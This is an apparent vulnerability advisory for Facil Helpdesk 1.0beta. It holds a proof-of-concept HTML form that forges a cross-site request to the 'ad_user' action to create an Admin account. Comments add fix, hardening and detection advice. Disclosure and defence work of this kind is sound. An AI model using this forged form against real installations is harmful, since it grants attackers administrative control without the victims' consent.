< ------------------- header data start ------------------- >

#############################################################

# Application Name :Facil Helpdesk

# Version : 1.0beta

# Vulnerability Type : XSRF (cross-site request forgery, CSRF)

# Impact : A new admin account can be added. (Original: Yeni Bir Admin Eklenebilir.)

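# Bug Fix Advice : A session key (session token) should be added to the form; the token only helps if the server checks it on every submission. (Original: Form’a Oturum Key’i (Session Token) eklenmeli)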

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<!--
  Proof-of-concept from the advisory: a stand-alone copy of the helpdesk's
  "add user" form that posts to tickets2.php?action=ad_user from outside the
  application.

  What the listing shows: none of the fields below is a per-session anti-CSRF
  token. Per the advisory the endpoint accepts the request anyway, so it is
  presumably authorised only by the session cookie the browser attaches
  automatically (the server-side handler is not shown here; confirm against
  the application code).

  Defender notes:
  * Fix: issue an unpredictable token bound to the user's session, embed it
    in the genuine form as a hidden field, and reject any POST to this action
    whose token is missing or does not match.
  * Defence in depth: SameSite session cookies, an Origin / Referer check on
    state-changing requests, and re-authentication before a privileged
    account is created.
  * Detection: review web logs for POSTs to this action whose Origin or
    Referer is not the helpdesk's own host, and audit the user table for
    unexpected Mod or Admin accounts.

  Markup note: the span and table opened on the form line are never closed,
  and the closing label tag further down has no opening tag in this listing;
  the markup appears to have been trimmed from the application's own page.
-->
<form action=http://www.demo.cromosoft.com/helpdesk/tickets2.php?action=ad_user method=post><span class=mio><table width=700 cellpadding=1 cellspacing=1 align=center>
<!-- Profile fields of the account to be created. -->
<input name=name size=30/>
<input name=username id=username size=30>
<input name=password type=password size=30>
<input name=email size=30>
<input name=website type=text id=website size=30>
<input name=company type=text id=company size=30>
<!-- The account role is submitted as the client-supplied "type" field (User, Mod or Admin).
     The handler should verify server-side that the requester is allowed to grant the chosen role. -->
<input name=type type=radio value=User checked>
<input type=radio name=type value=Mod>
<input type=radio name=type value=Admin>Admin</label>
<!-- Fixed flag (value 1), not a secret: it offers no protection against a forged request. -->
<input name=newuser type=hidden id=newuser value=1>
<input type=submit name=userform value=Submit />
</form>
< -- bug code end of -- >